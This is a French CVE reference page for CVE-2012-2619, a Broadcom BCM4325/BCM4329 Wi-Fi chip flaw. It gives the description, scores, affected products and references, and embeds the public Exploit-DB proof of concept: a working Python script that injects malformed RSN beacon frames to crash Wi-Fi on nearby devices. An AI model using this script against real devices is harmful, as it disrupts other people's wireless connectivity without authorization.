CVE-2012-2619
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The Broadcom BCM4325 and BCM4329 Wi-Fi chips, as used in certain Acer, Apple, Asus, Ford, HTC, Kyocera, LG, Malata, Motorola, Nokia, Pantech, Samsung, and Sony products, allow remote attackers to cause a denial of service (out-of-bounds read and Wi-Fi outage) via an RSN 802.11i information element.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 22739
Date de publication : 2012-11-14 23h00 +00:00
Auteur : CoreLabs
EDB Vérifié : No
# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el
investigador argentino Andrés Blanco,
# Vendor Homepage:
# Software Link: [download link if available]
# Version: 1.0
# Tested on:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad"
# CVE : 2012-2619
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
#part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
#Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)
Products Mentioned
Configuraton 0
Broadcom>>Bcm4325 >> Version *
Broadcom>>Bcm4329 >> Version *
Configuraton 0
Apple>>Iphone_os >> Version To (including) 6.0.2
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.6 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.7 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.8 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.9 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.10 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0.2 (Open CPE detail)
Apple>>Iphone_os >> Version 6.0
- Apple>>Iphone_os >> Version 6.0 (Open CPE detail)
Apple>>Iphone_os >> Version 6.0.1
- Apple>>Iphone_os >> Version 6.0.1 (Open CPE detail)
Références
http://lists.apple.com/archives/security-announce/2013/Jan/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM4329
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://lists.apple.com/archives/security-announce/2013/Jan/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
2025©
tesweb SA
